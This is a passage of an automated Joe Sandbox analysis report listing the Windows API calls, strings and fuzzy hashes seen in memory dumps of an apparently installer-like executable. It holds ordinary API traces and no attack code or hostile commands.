• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: Menu$Insert$Create$ItemPopupVersion
• String ID: ,$?
• API String ID: 2359071979-2308483597
• Opcode ID: 4986dcd06abefbee5f666d79fc26290c702fe8a84b14e195092edf3558bd7871
• Instruction ID: ecf66c9774bccec907b621c371347452b74b7622051e058d8a4a73451c3e974f
• Opcode Fuzzy Hash: 4986dcd06abefbee5f666d79fc26290c702fe8a84b14e195092edf3558bd7871
• Instruction Fuzzy Hash: D7510674A00245ABDB10EF6ADC816EA7BF9AF09304B11857BF904E73A6D738DD41CB58
APIs
• GetObjectA.GDI32(?,00000018,?), ref: 0041BF28
• GetObjectA.GDI32(?,00000018,?), ref: 0041BF37
• GetBitmapBits.GDI32(?,?,?), ref: 0041BF88
• GetBitmapBits.GDI32(?,?,?), ref: 0041BF96
• DeleteObject.GDI32(?), ref: 0041BF9F
• DeleteObject.GDI32(?), ref: 0041BFA8
• CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFC5
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: Object$BitmapBitsDelete$CreateIcon
• String ID:
• API String ID: 1030595962-0
• Opcode ID: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
• Instruction ID: 74cae3b7aa7aab4ce12a2fbd062d204c5c4082198076ec6df892ad84fd278e80
• Opcode Fuzzy Hash: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
• Instruction Fuzzy Hash: 6A510671A002199FCB10DFA9C9819EEB7F9EF48314B11416AF914E7395D738AD41CB68
APIs
• SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CEFE
• GetDeviceCaps.GDI32(00000000,00000026), ref: 0041CF1D
• SelectPalette.GDI32(?,?,00000001), ref: 0041CF83
• RealizePalette.GDI32(?), ref: 0041CF92
• StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041CFFC
• StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D03A
• SelectPalette.GDI32(?,?,00000001), ref: 0041D05F
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: PaletteStretch$Select$BitsCapsDeviceModeRealize
• String ID:
• API String ID: 2222416421-0
• Opcode ID: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
• Instruction ID: 4b814cf558339e083a7fb5ccd56fb4ffad9fd0a27a4bfdacf16c2dd2476febac
• Opcode Fuzzy Hash: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
• Instruction Fuzzy Hash: D2515EB0604200AFDB14DFA8C985F9BBBE9EF08304F10459AB549DB292C778ED81CB58
APIs
• SendMessageA.USER32(00000000,?,?), ref: 0045732E
  • Part of subcall function 0042427C: GetWindowTextA.USER32(?,?,00000100), ref: 0042429C
  • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
  • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
  • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00457395
• TranslateMessage.USER32(?), ref: 004573B3
• DispatchMessageA.USER32(?), ref: 004573BC
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: Message$TextThreadWindow$CurrentDispatchEnumSendTranslateWindows
• String ID: [Paused]
• API String ID: 1007367021-4230553315
• Opcode ID: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
• Instruction ID: a72840e20965590be0df7748d4dcd1bfe023db3bc5775872eefead19b10ec59e
• Opcode Fuzzy Hash: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
• Instruction Fuzzy Hash: 633175319082449ADB11DBB9EC81B9E7FB8EF49314F5540B7EC00E7292D73C9909DB69
APIs
• GetCursor.USER32(00000000,0046B55F), ref: 0046B4DC
• LoadCursorA.USER32(00000000,00007F02), ref: 0046B4EA
• SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4F0
• Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4FA
• SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B500
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: Cursor$LoadSleep
• String ID: CheckPassword
• API String ID: 4023313301-1302249611
• Opcode ID: 301d54e166a0b4011b0937e4b70ed1e1b4ade500f65d2603abaf2adc357acc1d
• Instruction ID: 9465d4cba05e43c3341d6d018928b45656d3fee3f016636846a90655da25d4f4
• Opcode Fuzzy Hash: 301d54e166a0b4011b0937e4b70ed1e1b4ade500f65d2603abaf2adc357acc1d
• Instruction Fuzzy Hash: D0316334740204AFD711EF69C899B9A7BE4EF45308F5580B6F9049B3A2D7789E40CB99
APIs
  • Part of subcall function 00477B94: GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
  • Part of subcall function 00477B94: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
  • Part of subcall function 00477B94: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
• SendMessageA.USER32(00000000,0000004A,00000000,00478026), ref: 00477CA1
• GetTickCount.KERNEL32 ref: 00477CE6
• GetTickCount.KERNEL32 ref: 00477CF0
• MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00477D45
Strings
• CallSpawnServer: Unexpected response: $%x, xrefs: 00477CD6
• CallSpawnServer: Unexpected status: %d, xrefs: 00477D2E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                                                                                        • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                                                                                        • API String ID: 613034392-3771334282
                                                                                                                                        • Opcode ID: a349fc6668a2a279a7709dc0d92d626649643492524c5ed72309cd5f58a9f2ee
                                                                                                                                        • Instruction ID: 262cbc5b9954910938d5a1e8e32dc50db46ad6f301169d9d39307b56b522dac3
                                                                                                                                        • Opcode Fuzzy Hash: a349fc6668a2a279a7709dc0d92d626649643492524c5ed72309cd5f58a9f2ee
                                                                                                                                        • Instruction Fuzzy Hash: 87318474B042159EDB10EBB9C8867EE76A0AF08714F90807AB548EB392D67C9D4187AD
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 0045983F
                                                                                                                                        Strings
                                                                                                                                        • .NET Framework CreateAssemblyCache function failed, xrefs: 00459862
                                                                                                                                        • Failed to load .NET Framework DLL "%s", xrefs: 00459824
                                                                                                                                        • Fusion.dll, xrefs: 004597DF
                                                                                                                                        • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 0045984A
                                                                                                                                        • CreateAssemblyCache, xrefs: 00459836
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc
                                                                                                                                        • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                                                                                        • API String ID: 190572456-3990135632
                                                                                                                                        • Opcode ID: 64b7f7115ec2050a4f0e42ab113808549d669c8acfba7d9bf3bad921683fe547
                                                                                                                                        • Instruction ID: 9a538673283cb431493768ab67eac729fe35d93f11f945e2dcd414e2b3f175b6
                                                                                                                                        • Opcode Fuzzy Hash: 64b7f7115ec2050a4f0e42ab113808549d669c8acfba7d9bf3bad921683fe547
                                                                                                                                        • Instruction Fuzzy Hash: A2318B70E10649ABCB10FFA5C88169EB7B8EF45315F50857BE814E7382DB389E08C799
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0041C048: GetObjectA.GDI32(?,00000018), ref: 0041C055
                                                                                                                                        • GetFocus.USER32 ref: 0041C168
                                                                                                                                        • GetDC.USER32(?), ref: 0041C174
                                                                                                                                        • SelectPalette.GDI32(?,?,00000000), ref: 0041C195
                                                                                                                                        • RealizePalette.GDI32(?), ref: 0041C1A1
                                                                                                                                        • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1B8
                                                                                                                                        • SelectPalette.GDI32(?,00000000,00000000), ref: 0041C1E0
                                                                                                                                        • ReleaseDC.USER32(?,?), ref: 0041C1ED
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Palette$Select$BitsFocusObjectRealizeRelease
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3303097818-0
                                                                                                                                        • Opcode ID: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
                                                                                                                                        • Instruction ID: 25a0b6576c779426e59073023ceed4ef49f3845c1b310514cd4f08ef327de147
                                                                                                                                        • Opcode Fuzzy Hash: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
                                                                                                                                        • Instruction Fuzzy Hash: 49116D71A44604BFDF10DBE9CC81FAFB7FCEB48700F50486AB518E7281DA7899008B28
                                                                                                                                        APIs
                                                                                                                                        • GetSystemMetrics.USER32(0000000E), ref: 00418C70
                                                                                                                                        • GetSystemMetrics.USER32(0000000D), ref: 00418C78
                                                                                                                                        • 6FD82980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C7E
                                                                                                                                          • Part of subcall function 004107F8: 6FD7C400.COMCTL32(0049B628,000000FF,00000000,00418CAC,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004107FC
                                                                                                                                        • 6FDECB00.COMCTL32(0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CCE
                                                                                                                                        • 6FDEC740.COMCTL32(00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CD9
                                                                                                                                        • 6FDECB00.COMCTL32(0049B628,00000001,?,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000), ref: 00418CEC
                                                                                                                                        • 6FD80860.COMCTL32(0049B628,00418D0F,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E), ref: 00418D02
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MetricsSystem$C400C740D80860D82980
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2924641870-0
                                                                                                                                        • Opcode ID: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                                                                                                        • Instruction ID: f48c8f8e6a400555c090207229051c9eae11b8a9b20c4da93df477ea8fa1a9e8
                                                                                                                                        • Opcode Fuzzy Hash: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                                                                                                        • Instruction Fuzzy Hash: 6B112475744204BBDB50EBA9EC82FAD73F8DB08704F504066B514EB2C1DAB9AD808759
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00483D24), ref: 00483D09
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseOpen
                                                                                                                                        • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                                                                                        • API String ID: 47109696-2530820420
                                                                                                                                        • Opcode ID: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
                                                                                                                                        • Instruction ID: 212569cff1cfb7858b589fbdbabdc9c693f1f7cc945fcf11155ec0ddb5f1f406
                                                                                                                                        • Opcode Fuzzy Hash: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
                                                                                                                                        • Instruction Fuzzy Hash: CC117C30704244AADB10FF65D862B5E7BF9DB45B05F618877A800E7282EB78AE05875C
                                                                                                                                        APIs
                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 0041B470
                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 0041B47F
                                                                                                                                        • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 0041B4C7
                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 0041B4D0
                                                                                                                                        • DeleteDC.GDI32(?), ref: 0041B4D9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
• API ID: ObjectSelect$Delete$Stretch
• String ID:
• API String ID: 1458357782-0
• Opcode ID: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
• Instruction ID: 052e9154069abc57648b404522aaf552eddfcc6d95cd3388d63b7ef9ce004286
• Opcode Fuzzy Hash: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
• Instruction Fuzzy Hash: 7B115C72E40619ABDB10DAD9DC86FEFB7BCEF08704F144555B614F7282C678AC418BA8
APIs
• GetDC.USER32(00000000), ref: 00495519
  • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
• SelectObject.GDI32(00000000,00000000), ref: 0049553B
• GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00495AB9), ref: 0049554F
• GetTextMetricsA.GDI32(00000000,?), ref: 00495571
• ReleaseDC.USER32(00000000,00000000), ref: 0049558E
Strings
• ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00495546
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: Text$CreateExtentFontIndirectMetricsObjectPointReleaseSelect
• String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
• API String ID: 2948443157-222967699
• Opcode ID: 15e89f7ca813e7522845c960856b2cdc022ede195b48aa860a28df6e22a0f939
• Instruction ID: fbfe8d588f566b1ae935688c8d8bbf43f3780a3d17a9f30f48774e54417b88ea
• Opcode Fuzzy Hash: 15e89f7ca813e7522845c960856b2cdc022ede195b48aa860a28df6e22a0f939
• Instruction Fuzzy Hash: 98018476A04704BFEB05DBE9CC41E5EB7EDEB48714F614476F604E7281D678AE008B28
APIs
• GetCursorPos.USER32 ref: 004233AF
• WindowFromPoint.USER32(?,?), ref: 004233BC
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233CA
• GetCurrentThreadId.KERNEL32 ref: 004233D1
• SendMessageA.USER32(00000000,00000084,?,?), ref: 004233EA
• SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423401
• SetCursor.USER32(00000000), ref: 00423413
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
• String ID:
• API String ID: 1770779139-0
• Opcode ID: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
• Instruction ID: 22bb490dc700fc35bbf8fe9eba0271ced42fa0644d0760cf779c582944844a3d
• Opcode Fuzzy Hash: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
• Instruction Fuzzy Hash: BA01D4223046103AD6217B755D82E2F26E8DB85B15F50407FF504BB283DA3D9D11937D
APIs
• GetModuleHandleA.KERNEL32(user32.dll), ref: 0049533C
• GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00495349
• GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00495356
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
• API String ID: 667068680-2254406584
• Opcode ID: 5579b8dc187442e7c517f6558358e9e0fd6dcc5405420102cd7b083255a2d8af
• Instruction ID: d6622564654ba01390171a2dbbf88ec7785202fdd48675fe733a6c53722864ad
• Opcode Fuzzy Hash: 5579b8dc187442e7c517f6558358e9e0fd6dcc5405420102cd7b083255a2d8af
• Instruction Fuzzy Hash: 7EF0F692741F156ADA3121660C41B7F6B8CCB917B1F240137BE44A7382E9ED8C0047ED
APIs
• GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045D691
• GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045D6A1
• GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045D6B1
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: AddressProc
• String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
• API String ID: 190572456-212574377
• Opcode ID: 0c00d940adfee3eed657d73ca32928dd6beaef8d72542be6af97d79d08c28db7
• Instruction ID: 26f5c6c79611f6cc0facecefa5b4932716cc5d8e9f8ea2477ead0514974f6e87
• Opcode Fuzzy Hash: 0c00d940adfee3eed657d73ca32928dd6beaef8d72542be6af97d79d08c28db7
• Instruction Fuzzy Hash: 0EF01DB0D00705DFD724EFB6ACC672736D5AB6831AF50813B990E95262D778045ACF2C
APIs
• GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,004812C8), ref: 0042EA35
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA3B
• InterlockedExchange.KERNEL32(0049B668,00000001), ref: 0042EA4C
  • Part of subcall function 0042E9AC: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
  • Part of subcall function 0042E9AC: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
  • Part of subcall function 0042E9AC: InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
• ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042EA60
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
